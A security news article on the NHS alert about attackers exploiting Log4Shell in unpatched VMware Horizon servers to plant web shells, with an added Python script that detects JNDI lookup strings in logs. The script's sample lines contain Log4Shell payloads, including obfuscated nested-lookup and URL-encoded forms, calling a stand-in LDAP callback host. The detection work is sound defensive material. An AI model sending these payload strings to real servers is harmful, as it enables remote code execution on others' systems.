NHS Warns of Hackers Targeting Log4j Flaws in VMware Horizon

The digital security team at the U.K. National Health Service (NHS) has raised the alarm on active exploitation of Log4Shell vulnerabilities in unpatched VMware Horizon servers by an unknown threat actor to drop malicious web shells and establish persistence on affected networks for follow-on attacks.

“The attack likely consists of a reconnaissance phase, where the attacker uses the Java Naming and Directory Interface™ (JNDI) via Log4Shell payloads to call back to malicious infrastructure,” the non-departmental public body said in an alert. “Once a weakness has been identified, the attack then uses the Lightweight Directory Access Protocol (LDAP) to retrieve and execute a malicious Java class file that injects a web shell into the VM Blast Secure Gateway service.”
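
The reconnaissance phase described in the alert leaves JNDI lookup strings in request logs. The following Python code is an added example, not part of the NHS alert or the original article: it flags such strings in log lines and reports the callback scheme and host, and it goes beyond the plain form by also resolving nested lookups and URL encoding. The function names, log layout and `example.invalid` hosts are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Nested lookups that resolve to a literal: ${lower:J}, ${upper:j}, ${env:X:-j}, ${::-j}.
_NESTED = re.compile(
    r"\$\{(?:lower|upper):([^${}]*)\}|\$\{(?!jndi:)[^${}]*?:-([^${}]*)\}", re.I)
# A JNDI lookup plus the scheme and host it would call back to.
_JNDI = re.compile(r"\$\{jndi:(ldaps?|rmi|dns|iiop)://([^/\s}:]+)", re.I)

def resolve_nested(text, max_rounds=10):
    """Collapse nested lookups to their argument or default (case is ignored later)."""
    for _ in range(max_rounds):
        collapsed = _NESTED.sub(
            lambda m: m.group(1) if m.group(1) is not None else m.group(2), text)
        if collapsed == text:
            break
        text = collapsed
    return text

def find_jndi_callbacks(line):
    """Return lower-cased (scheme, host) pairs for JNDI lookups in one log line."""
    candidate = resolve_nested(unquote(unquote(line)))  # handles double URL-encoding
    return [(m.group(1).lower(), m.group(2).lower()) for m in _JNDI.finditer(candidate)]

def scan(lines):
    """Map 1-based line numbers to the callbacks found on that line."""
    hits = {}
    for number, line in enumerate(lines, start=1):
        found = find_jndi_callbacks(line)
        if found:
            hits[number] = found
    return hits

# Constructed sample lines (not real traffic); example.invalid never resolves.
SAMPLE_LINES = [
    "10.0.0.5 GET /index.html Accept-Language: ${jndi:ldap://cb.example.invalid:1389/a}",
    "10.0.0.5 GET /index.html Accept-Language: ${${lower:J}ndi:${::-l}dap://cb.example.invalid/a}",
    "10.0.0.5 GET /index.html?q=%24%7Bjndi%3Aldap%3A%2F%2Fcb.example.invalid%2Fa%7D",
    "10.0.0.9 GET /index.html User-Agent: Mozilla/5.0",
]

if __name__ == "__main__":
    for number, found in scan(SAMPLE_LINES).items():
        print(number, found)
```

A hit only shows that a lookup string reached the log; whether the server acted on it depends on its patch level, so outbound LDAP connections from the host to the reported callback address are the follow-up check.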

The web shell, once deployed, can serve as a conduit to carry out a multitude of post-exploitation activities such as deploying additional malicious software, data exfiltration, or deployment of ransomware. VMware Horizon versions 7.x and 8.x are vulnerable to the Log4j vulnerabilities.

Log4Shell is an exploit for CVE-2021-44228 (CVSS score: 10.0), a critical arbitrary remote code execution flaw in Apache Log4j 2, a ubiquitous open-source logging framework, which has been put to use as part of different malware campaigns since it came to light in December 2021. An array of hacking groups, ranging from nation-state actors to ransomware cartels, have pounced on the vulnerability to date.

The development also marks the second time VMware products have come under exploitation as a result of vulnerabilities in the Log4j library. Last month, AdvIntel researchers disclosed that attackers were targeting systems running VMware vCenter servers with the aim of installing Conti ransomware.

VMware, for its part, released security updates last month for Horizon, vCenter, and other products impacted by Log4Shell. The virtualization services provider acknowledged scanning attempts in the wild and urged customers to install the patches where applicable or apply workarounds temporarily to counter any potential risk.